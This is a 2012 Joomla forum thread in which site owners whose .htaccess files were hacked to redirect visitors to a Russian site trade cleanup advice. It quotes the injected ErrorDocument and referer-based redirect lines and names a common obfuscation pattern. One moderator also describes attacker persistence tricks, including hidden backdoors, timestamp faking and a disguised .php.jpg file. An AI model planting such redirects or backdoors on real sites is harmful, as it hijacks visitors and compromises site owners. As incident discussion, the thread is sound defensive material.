htaccess hacked, re-directing traffic to xx.ru

Discussion regarding Joomla! 2.5 security issues.

Moderators: mandville, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2737
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by PhilD » Sun Apr 01, 2012 7:50 pm

First "dot" files are hidden files that are not accessible to normal web requests (viewing) on a properly configured server. Just as a properly configured server won't list directory contents. On an improperly configured server that will expose the htaccess and directory contents, then showing the htaccess file or listing directory contents is going to be the least of your worries.

To answer your question though, yes the added code (either version) does prevent viewing the file, just not when someone hacks your site.

Once access to a site/domain is gained by some means other than normal web access, then everything is accessible. It does not matter what is put into the htaccess to "prevent" viewing. This includes the htaccess file, any password protected directories, any configuration files, and anything else both inside of and outside of the public_html directory.

Put it like this If I gain access then I can drop a 60k file on your site in some directory your not likely to look in or replace in an update. I can then view and control all aspects of your domain while I sit at my computer, no usernames and no passwords are required. All I have to do is call my script from a browser and bingo your entire domain is in front of me for me to do as I like.

Since it seems popular to add redirects to bad sites in your htacess, then I'll put a hidden script somewhere on your site to do this and detect if the code I added is removed. If so then the script will put it back. If I'm smart I'll go slightly more sophisticated, automate my scripts to replicate, hide my script(s) better and add a backdoor so you can't find script(s) by scanning for some @eval(gzinflate(base64_decode($code))); code. I'll also change the mtime of any files I add code to so the mtime is the same as what it originally was before I touched it.

On a misconfigured server or one with some exploit I can take advantage of, this same 60k script will allow me to both see and access every other domain account on the server as if it were a local drive on my computer and will in most cases also allow me to control the entire server. no root user or root password needed.


So unless you completely delete everything in the public_html directory and inspect closely whatever your going to reuse, and update everything to the latest version to close the security hole, and follow the rest of the stuff on the checklists, I will be back. If for no other reason than to mess with you. BTW, Remember that large image directory you did not take the time to inspect? It's only photos so no need to right? Well I put a file in there called rockymountain.php.jpg that allows me access to your site so I can hack your freshly cleaned and restored site.
PhilD

renegadeskone
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Thu Feb 16, 2012 10:45 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by renegadeskone » Mon Apr 02, 2012 12:34 am

Thanks for all your replies. Issue is revolved for me, here's what I did:

- Upgraded all extensions to latest version
- Upgraded to latest Joomla
- Disabled eXtplorer (I don't even remember having it installed!)
- Blocked all admin accounts except for mine
- Changed my admin password
- Changed the FTP password
- Unpacked Joomla full version on to web server root, deleted installation folder
- Manually deleted all .htaccess files which where in the root ALL 1st level folders
- Used Admin Tools to generate a new htaccess file, left all settings as default
- Updated passwords for relevant admin accounts to be reactived

Seems to all be working good now. Thanks again for your replies. I have a huuuuuuge image directory on this site so there may still be malicious code lingering around. I'm going to download the whole site and sift through it manually to see if I can find anything else.

My host said that it's likely access was given to super admin account as there was an account with user of admin and password of password, which there definitely was not on the site previously. I'll be updating the database password too.

Cheers

big vern
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Mon Nov 24, 2008 3:07 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by big vern » Mon Apr 02, 2012 2:33 pm

Ok, this issue affected me, - I tried everything but in the end the only thing that worked was biting the bullet and wiping the orginal joomla install and installing the latest version (I know, I know this is what we are told by mods and experts but you'll try anything to cut corners - Thanks for the advice all)
Only posting this to save others some time if they think there is an easy shortcut
was also running PHPBB on my site - luckily did not need to remove and restore that

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htaccess hacked, re-directing traffic to xx.ru

Post by mandville » Mon Apr 02, 2012 2:45 pm

big vern wrote:(I know, I know this is what we are told by mods and experts but you'll try anything to cut corners -
translates to http://docs.joomla.org/Top_10_Stupidest ... tor_Tricks
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20652
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ Germany/ S'pore/Bogor/ North America
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by leolam » Mon Apr 02, 2012 3:03 pm

mandville wrote: translates to
ho,ho,ho,ho Mandville THAT is MEAN! (lot of high grade salt in open wounds) lol

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -

andysdp
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Site hacked .htaccess keeps changing

Post by andysdp » Mon Apr 02, 2012 6:57 pm

Hi Guys

I think my site has been hacked and I'm getting redirects to a russian site and pages not loading as they should. The main .htaccess file keeps changing / reappearing after deleting

400 http://xx.ru/in.cgi?4 ErrorDocument 401 http://xx.ru/in.cgi?4 ErrorDocument 403 http://xx.ru/in.cgi?4 ErrorDocument 404 http://xx.ru/in.cgi?4 ErrorDocument 500 http://xx.ru/in.cgi?4 <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|[youtube]|wikipedia|qq|excite </IfModule>



Any advice would be good. Have had a good search around on the forum and don't really know what to do next. Although had a Joomla site for many years, I've not had to deal with anything like this before!

Many thanks

Andy



Last PHP Error(s) Reported :: Forum Post Assistant (v1.2.0) : 2nd April 2012 wrote:[21-Mar-2012 00:06:04] PHP Warning: include_once() [<a href=\'function.include\'>function.include</a>]: Failed opening \'/home/stli2847/public_html/jupgrade/administrator/components/com_acymailing/helpers/helper.php\' for inclusion (include_path=\'.:/usr/lib/php:/usr/local/lib/php:/home/stli2847/public_html/jupgrade/administrator/components/com_gcalendar/libraries\') in /home/stli2847/public_html/jupgrade/modules/mod_acymailing/mod_acymailing.php on line 9
Forum Post Assistant (v1.2.0) : 2nd April 2012 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.4-Stable (Ember) 2-April-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: stli2847 (uid: 1013/gid: 1010) | Group: stli2847 (gid: 1010) | Valid For: 1.7 and above
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 1 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-238.12.1.el5 | Technology: x86_64 | Web Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 | Encoding: gzip, deflate | Doc Root: /home/stli2847/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.17 | PHP API: cgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: error_log | Last Known Error: 21st March 2012 00:06:04. | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 8M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 128M

MySQL Configuration :: Version: 5.1.61-log (Client:5.1.61) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 3.15 MiB | #of _FPA_TABLE: 187
Detailed Environment :: wrote:PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | filter (0.11.0) | ftp () | gd () | gettext () | hash (1.0) | iconv () | session () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | SimpleXML (0.1) | posix () | Reflection (0.1) | standard (5.2.17) | SPL (0.2) | mysqli (0.1) | soap () | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | cgi () | eAccelerator (0.9.6.1) | suhosin (0.9.32.1) | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | pdo_mysql (1.0.2) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: zip |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |
Templates Discovered :: wrote:Templates :: SITE :: siteground-j15-18 (1.0.0) | my_japurity (1.2.0) | beez_20 (2.5.0) | SiteGround-j16-7 (1.0.0) | siteground-j15-23 (1.0.0) | ProPages-FJT (1.7.0) | beez5 (2.5.0) | siteground-j16-5 (1.0.0) | 123wd-j15-2 (1.0.0) | atomic (2.5.0) | JA_Purity_ii (2.5.0) | bayolax (1.7.0) | JA_Purity (1.2.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |
Last edited by mandville on Mon Apr 02, 2012 7:18 pm, edited 1 time in total.
Reason: trimmed code, removed link

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: Site hacked .htaccess keeps changing

Post by Webdongle » Mon Apr 02, 2012 7:08 pm

Can you run the FPA with the extensions showing ?
Have you checked your computer ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

andysdp
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by andysdp » Tue Apr 03, 2012 1:37 am

Thanks for reply: Computer has been checked for viruses and malware
Last PHP Error(s) Reported :: Forum Post Assistant (v1.2.0) : 3rd April 2012 wrote:[21-Mar-2012 00:06:04] PHP Warning: include_once() [<a href=\'function.include\'>function.include</a>]: Failed opening \'/home/stli2847/public_html/jupgrade/administrator/components/com_acymailing/helpers/helper.php\' for inclusion (include_path=\'.:/usr/lib/php:/usr/local/lib/php:/home/stli2847/public_html/jupgrade/administrator/components/com_gcalendar/libraries\') in /home/stli2847/public_html/jupgrade/modules/mod_acymailing/mod_acymailing.php on line 9
Forum Post Assistant (v1.2.0) : 3rd April 2012 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.4-Stable (Ember) 2-April-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: stli2847 (uid: 1013/gid: 1010) | Group: stli2847 (gid: 1010) | Valid For: 1.7 and above
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: Yes | GZip: 0 | Cache: 1 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.18-238.12.1.el5 | Technology: x86_64 | Web Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 | Encoding: gzip, deflate | Doc Root: /home/stli2847/public_html | System TMP Writable: Yes

PHP Configuration :: Version: 5.2.17 | PHP API: cgi | Session Path Writable: Yes | Display Errors: 1 | Error Reporting: 6135 | Log Errors To: error_log | Last Known Error: 21st March 2012 00:06:04. | Register Globals: | Magic Quotes: 1 | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 8M | Max. POST Size: 8M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 128M

MySQL Configuration :: Version: 5.1.61-log (Client:5.1.61) | Host: --protected-- (--protected--) | Collation: latin1_swedish_ci (Character Set: latin1) | Database Size: 3.15 MiB | #of _FPA_TABLE: 187
Detailed Environment :: wrote:PHP Extensions :: date (5.2.17) | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | calendar () | ctype () | curl () | dom (20031129) | filter (0.11.0) | ftp () | gd () | gettext () | hash (1.0) | iconv () | session () | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | SimpleXML (0.1) | posix () | Reflection (0.1) | standard (5.2.17) | SPL (0.2) | mysqli (0.1) | soap () | sockets () | imap () | tokenizer (0.1) | xml () | xmlreader (0.1) | xmlwriter (0.1) | xsl (0.1) | cgi () | eAccelerator (0.9.6.1) | suhosin (0.9.32.1) | PDO (1.0.4dev) | pdo_sqlite (1.0.1) | SQLite (2.0-dev) | pdo_mysql (1.0.2) | ionCube Loader () | Zend Optimizer () | Zend Engine (2.2.0) |
Potential Missing Extensions :: zip |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions :: wrote:Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) :: None
Database Information :: wrote:Database _FPA_STATS :: Uptime: 2317620 | Threads: 1 | Questions: 2493237 | Slow queries: 0 | Opens: 3078 | Flush tables: 1 | Open tables: 1318 | Queries per second avg: 1.75 |
Extensions Discovered :: wrote:Components :: SITE :: com_wrapper (2.5.0) | WF_FILESYSTEM_JOOMLA_TITLE (2.0.21) | WF_POPUPS_JCEMEDIABOX_TITLE (2.0.21) | WF_POPUPS_WINDOW_TITLE (2.0.21) | WF_AGGREGATOR_VIMEO_TITLE (2.0.21) | WF_AGGREGATOR_[youtube]_TITLE (2.0.21) | WF_LINKS_JOOMLALINKS_TITLE (2.0.21) | WF_MEDIAPLAYER_JCEPLAYER_TITLE (2.0.21) | WF_BROWSER_TITLE (2.0.21) | WF_XHTMLXTRAS_TITLE (2.0.21) | WF_INLINEPOPUPS_TITLE (2.0.21) | WF_SPELLCHECKER_TITLE (2.0.21) | WF_IMGMANAGER_TITLE (2.0.21) | WF_LAYER_TITLE (2.0.21) | WF_VISUALCHARS_TITLE (2.0.21) | WF_LINK_TITLE (2.0.21) | WF_CONTEXTMENU_TITLE (2.0.21) | WF_MEDIA_TITLE (2.0.21) | WF_STYLE_TITLE (2.0.21) | WF_NONBREAKING_TITLE (2.0.21) | WF_CLEANUP_TITLE (2.0.21) | WF_PRINT_TITLE (2.0.21) | WF_TEXTCASE_TITLE (2.0.21) | WF_PREVIEW_TITLE (2.0.21) | WF_ARTICLE_TITLE (2.0.21) | WF_PASTE_TITLE (2.0.21) | WF_SEARCHREPLACE_TITLE (2.0.21) | WF_SOURCE_TITLE (2.0.21) | WF_DIRECTIONALITY_TITLE (2.0.21) | WF_FULLSCREEN_TITLE (2.0.21) | WF_AUTOSAVE_TITLE (2.0.21) | WF_TABLE_TITLE (2.0.21) | com_mailto (2.5.0) | os_authnet (1.0) | os_eway (1.0) | os_worldpay (1.0) | os_offline (1.0) | os_paypal (1.0) |
Components :: ADMIN :: com_banners (2.5.0) | com_messages (2.5.0) | com_admin (2.5.0) | com_plugins (2.5.0) | com_cpanel (2.5.0) | com_login (2.5.0) | JCE (2.0.21) | Editor - JCE (2.0.21) | Unknown (-) | AcyMailing (3.6.0) | AcyMailing : Statistics Plugin (3.6.0) | AcyMailing table of contents g (1.0.0) | AcyMailing : trigger Joomla Co (3.6.0) | AcyMailing Module (3.6.0) | AcyMailing Manage text (1.0.0) | AcyMailing : share on social n (1.0.0) | AcyMailing Tag : Website links (3.6.0) | AcyMailing Tag : content inser (3.6.0) | AcyMailing : (auto)Subscribe d (3.6.0) | AcyMailing Tag : Joomla User I (3.6.0) | AcyMailing Tag : Date / Time (3.6.0) | AcyMailing Tag : Subscriber in (3.6.0) | AcyMailing Tag : Manage the Su (3.6.0) | AcyMailing Template Class Repl (3.6.0) | AcyMailing Tag : CB User infor (3.6.0) | com_templates (2.5.0) | com_checkin (2.5.0) | com_newsfeeds (2.5.0) | com_joomlaupdate (2.5.0) | com_modules (2.5.0) | com_content (2.5.0) | com_redirect (2.5.0) | com_categories (2.5.0) | com_weblinks (2.5.0) | com_finder (2.5.0) | com_users (2.5.0) | Event Booking (1.4.4) | com_config (2.5.0) | com_installer (2.5.0) | com_search (2.5.0) | com_media (2.5.0) | com_cache (2.5.0) | com_menus (2.5.0) | JoomGallery (2.0.0) | COM_GCALENDAR (2.6.4) | com_languages (2.5.0) |

Modules :: SITE :: mod_wrapper (2.5.0) | mod_custom (2.5.0) | mod_login (2.5.0) | MOD_GCALENDAR_NEXT (2.6.4) | mod_whosonline (2.5.0) | mod_articles_archive (2.5.0) | mod_menu (2.5.0) | mod_feed (2.5.0) | EB Cart (1.0.0) | mod_languages (2.5.0) | mod_footer (2.5.0) | AcyMailing Module (3.6.0) | mod_syndicate (2.5.0) | mod_banners (2.5.0) | mod_search (2.5.0) | mod_weblinks (2.5.0) | mod_users_latest (2.5.0) | mod_articles_latest (2.5.0) | mod_related_items (2.5.0) | Ebooking Mini Calendar (1.0) | Up-coming events (1.2) | mod_articles_category (2.5.0) | Search Events (1.0) | JoomImages (2.0 BETA 5) | mod_articles_popular (2.5.0) | Events By Location (1.0) | mod_articles_news (2.5.0) | MOD_GCALENDAR (2.6.4) | mod_random_image (2.5.0) | Event Categories (1.0) | MOD_GCALENDAR_UPCOMING (2.6.4) | mod_stats (2.5.0) | mod_articles_categories (2.5.0) | mod_breadcrumbs (2.5.0) | mod_finder (2.5.0) |
Modules :: ADMIN :: mod_title (2.5.0) | mod_custom (2.5.0) | mod_multilangstatus (2.5.0) | mod_login (2.5.0) | mod_toolbar (2.5.0) | mod_menu (2.5.0) | mod_feed (2.5.0) | mod_submenu (2.5.0) | mod_version (2.5.0) | mod_logged (2.5.0) | mod_status (2.5.0) | mod_popular (2.5.0) | mod_quickicon (2.5.0) | mod_latest (2.5.0) |

Plugins :: SITE :: plg_user_joomla (2.5.0) | plg_user_contactcreator (2.5.0) | plg_user_profile (2.5.0) | AcyMailing Tag : Website links (3.6.0) | AcyMailing : share on social n (1.0.0) | AcyMailing Tag : Joomla User I (3.6.0) | AcyMailing Tag : Subscriber in (3.6.0) | AcyMailing Tag : CB User infor (3.6.0) | AcyMailing Manage text (1.0.0) | AcyMailing Tag : Date / Time (3.6.0) | AcyMailing : trigger Joomla Co (3.6.0) | AcyMailing : Statistics Plugin (3.6.0) | AcyMailing Template Class Repl (3.6.0) | AcyMailing table of contents g (1.0.0) | AcyMailing Tag : Manage the Su (3.6.0) | AcyMailing Tag : content inser (3.6.0) | plg_search_weblinks (2.5.0) | plg_search_gcalendar (2.6.4) | plg_search_newsfeeds (2.5.0) | Search - Event Booking (1.0) | plg_search_content (2.5.0) | plg_search_categories (2.5.0) | plg_search_contacts (2.5.0) | plg_system_logout (2.5.0) | plg_system_log (2.5.0) | plg_system_gcalendar (2.6.4) | plg_system_cache (2.5.0) | plg_system_redirect (2.5.0) | plg_system_languagefilter (2.5.0) | plg_system_highlight (2.5.0) | plg_system_languagecode (2.5.0) | plg_system_remember (2.5.0) | JA T3 Framework (2.5.1) | plg_system_p3p (2.5.0) | Google Maps (2.15) | plg_system_sef (2.5.0) | plg_system_debug (2.5.0) | ebreminder (1.4.4) | AcyMailing : (auto)Subscribe d (3.6.0) | plg_editors-xtd_image (2.5.0) | plg_editors-xtd_readmore (2.5.0) | plg_editors-xtd_pagebreak (2.5.0) | PLG_JOOMBU (2.0 BETA) | plg_editors-xtd_article (2.5.0) | plg_editors_codemirror (1.0) | plg_editors_tinymce (3.4.9) | Editor - JCE (2.0.21) | Events Booking - Cart Update (1.0) | Events Booking - ACYMailing ne (1.0) | plg_quickicon_extensionupdate (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_ldap (2.5.0) | plg_authentication_gmail (2.5.0) | EB Event Plugin (1.0) | plg_content_emailcloak (2.5.0) | plg_content_geshi (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_vote (2.5.0) | plg_content_pagebreak (2.5.0) | plg_content_joomla (2.5.0) | EB Register Plugin (1.0) | PLG_JOOMPLU (2.0 BETA) | plg_gcalendar_next (2.6.4) | plg_content_pagenavigation (2.5.0) | plg_content_finder (2.5.0) | plg_finder_weblinks (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_content (2.5.0) | plg_finder_categories (2.5.0) | plg_finder_contacts (2.5.0) | plg_captcha_recaptcha (2.5.0) | plg_extension_joomla (2.5.0) |
Templates Discovered :: wrote:Templates :: SITE :: siteground-j15-18 (1.0.0) | my_japurity (1.2.0) | beez_20 (2.5.0) | SiteGround-j16-7 (1.0.0) | siteground-j15-23 (1.0.0) | ProPages-FJT (1.7.0) | beez5 (2.5.0) | siteground-j16-5 (1.0.0) | 123wd-j15-2 (1.0.0) | atomic (2.5.0) | JA_Purity_ii (2.5.0) | bayolax (1.7.0) | JA_Purity (1.2.0) | rhuk_milkyway (1.0.2) |
Templates :: ADMIN :: bluestork (2.5.0) | hathor (2.5.0) |

yaanimai
Joomla! Explorer
Joomla! Explorer
Posts: 359
Joined: Thu Jun 14, 2007 2:48 pm
Location: Coppell, Texas
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by yaanimai » Tue Apr 03, 2012 4:05 am

I have one Joomla 1.5.25 site that got this same hack to the .htaccess file. There were also .htaccess files with the maliicious code in every Joomla sub directory, modules, plugins, administrator, images, templates, etc....

I have lots of Joomla sites on another host that has not been hacked, but I have one client that hosts his own site on a GoDaddy account.

I deleted every single folder & file on the hosting account & restored from a "History" version that GoDaddy keeps. This version did not have the malicious .htaccess files in it.

I upgraded to Joomla 1.5.26 but within a few minutes the root directory & all the Joomla sub directories had the hacked .htaccess files in them again (not sure if they got generated before I did the 1.5.26 upgrade.)

I deleted them again & so far they have not come back.

If they come back again I will post here.

I am wondering if they came from another account on the same server?

yaanimai
Joomla! Explorer
Joomla! Explorer
Posts: 359
Joined: Thu Jun 14, 2007 2:48 pm
Location: Coppell, Texas
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by yaanimai » Tue Apr 03, 2012 4:42 am

The malicious code is back in the .htaccess file!

Not sure what is generating the code or where it is coming from.

The core joomla sub directories also have new .htaccess files in them, so far they are empty but I know some code is about to appear in them soon.

Not sure what to do about this now.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15150
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: htaccess hacked, re-directing traffic to xx.ru

Post by mandville » Tue Apr 03, 2012 8:35 am

if people run the cron commands here http://docs.joomla.org/Security_Checkli ... d_and_cron then that may help time stamp the insertion of the code so that your logs/host can track it down.
not on some busy sites a large email will be produced.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
jimbrooking
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 104
Joined: Thu Mar 17, 2011 12:38 am

Site Hacked - 404 errors hijacked

Post by jimbrooking » Tue Apr 03, 2012 10:43 am

My site (http://www.fearringtonfha .org) was compromised on or about March 30. On Sunday, April 1 I found that all the .htaccess files on my Joomla 2.5 site (upgraded from 1.7 on March 18) had been modified to send traffic to a Russian malware site in case of any page error (401, 402, 403, 404, 500). I repaired all the .htaccess files. However 404 errors were still being redirected to the same Russian site.

This morning I changed my .htaccess file to handle 404 errors with a page within my Joomla site. This appears to work as expected, and 404 errors now go correctly to the page I specify in the .htaccess file.

Apparently some code within Joomla handles 404 errors (i.e., prior to my latest change to .htaccess), and apparently this code has somehow been compromised. Can anyone give me an idea of where to look for the bad code?

Thanks.
Last edited by mandville on Tue Apr 03, 2012 11:39 am, edited 2 times in total.
Reason: Moved the topic from the forum Administration to Security

yaanimai
Joomla! Explorer
Joomla! Explorer
Posts: 359
Joined: Thu Jun 14, 2007 2:48 pm
Location: Coppell, Texas
Contact:

Re: htaccess hacked, re-directing traffic to xx.ru

Post by yaanimai » Tue Apr 03, 2012 1:43 pm

I think I have my site fixed.

After replacing the compromised .htaccess file in the root & deleting the .htaccess files in all the Joomla core sub directories, the .htaccess files were being regenerated. There is code inserted into the beginning of the core .htaccess that is in the root directory & also a little way below the bottom of the same .htaccess file.

After looking in the files carefully, and following some hints & found in these forums & other posts on the internet I found a file called "_cache_iccizijj.php" in the tmp sub directory. It has comments at the beginning of the file about vBulletin 3.1.9 including vBulletin copyright notice. It has a lot of very long strings of code that look like random key strokes but I suspect this file is generating the .htaccess files.

I renamed the _cache_iccizijj.php file & deleted the malicious code in the root .htacess file & deleted all the other .htaccess files in the Joomla core sub directories and my site has been trouble free now for several hours.

My site was Joomla 1.5.25 I upgraded it to 1.5.26. I changed the Super Admin & Admin user passwords.

It appears to be fixed now. I can type in an incorrect site url & I get the correct 404 page. I will post back here if the problem reoccurs. I am about to delete the renamed _cache_iccizijj.php file.

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Tue Apr 03, 2012 3:59 pm

As previously stated many times by several people. Deleting a few files is no good. The only way to be certain to be rid of all the infected files is to delete every folder/file in on the server.

Giving advice to the contrary is ill advised.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

andysdp
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by andysdp » Tue Apr 03, 2012 4:05 pm

yaanimai - thanks for your post! I think I have fixed my site also. I too found a similar file you mentioned in the tmp sub directory - mine called _cache_ldxmbzqi.php. Again had Vbulletin references and a load of what looks like encrypted code. I was happy to delete it as I have no VBulletin installs. After deleting this file and cleaning up three .htaccess file my site has been back to normal for a couple of hours and without new code injected into the .htaccess files. Will monitor and report back.

Just need to know how it got there in the first place......

Cheers

Andy

andysdp
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by andysdp » Tue Apr 03, 2012 4:26 pm

Interestingly from my logs there has been someone from IP address 188.190.127.71 trying to access the above file. Somewhere in the Ukraine called Infium host

Someone send the boys round.....

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Tue Apr 03, 2012 4:48 pm

andysdp wrote:.... I think I have fixed my site also. I too found a similar file you mentioned in the tmp sub directory - mine called _cache_ldxmbzqi.php. ...
And we all know what thought did :laugh:

Unless you delete all the folders/files on the server then you are still infected. It is not just the .htaccess that is being infected with the redirect code. Images and legitimate files are also being infected.

Once access is gained to your server then various files are loaded onto your server.

What is your url ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

andysdp
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by andysdp » Tue Apr 03, 2012 5:13 pm

http://www.1stlinslade. org.uk this is the older 1.5.23 site which is live to our members. The updated 2.5.4 site is sitting in http://www.1stlinslade. org.uk/jupgrade until I have completed all my changes.

Webdongle - I bow to your greater knowledge and will take onboard any further advice. In simple terms what do you suggest I do next. Wiping and starting again sounds like an unenviable task! Especially after spending time adjusting the JA-Purity template which was core in 1.5 and now not core in 2.5! As I have said earlier I have been running Joomla for many years, and this is hobby done in spare time for my Scout Group - I'm not a programmer! Is there any easy to follow guide for deleting folders/files while keeping all content intact - has the database been infected? How can I assess the extent of infection?

Many thanks for your help

Andy
Last edited by mandville on Tue Apr 03, 2012 5:36 pm, edited 1 time in total.
Reason: broke link

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 44021
Joined: Sat Apr 05, 2008 9:58 pm

Re: htaccess hacked, re-directing traffic to xx.ru

Post by Webdongle » Tue Apr 03, 2012 5:53 pm

@andysdp
Told you so, scanned a few minutes ago
Capture 143.PNG
Now will you please stop saying its fixed by deleting just a few files ? That sort of comment only allows others to falsely think their sites are safe by doing the same.

Again I say
As previously stated many times by several people. Deleting a few files is no good. The only way to be certain to be rid of all the infected files is to delete every folder/file in on the server.

Giving advice to the contrary is ill advised.
You do not have the required permissions to view the files attached to this post.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".

andysdp
Joomla! Apprentice
Joomla! Apprentice
Posts: 6
Joined: Tue Feb 17, 2009 11:15 am

Re: htaccess hacked, re-directing traffic to xx.ru

Post by andysdp » Wed Apr 04, 2012 1:51 am

@webdongle
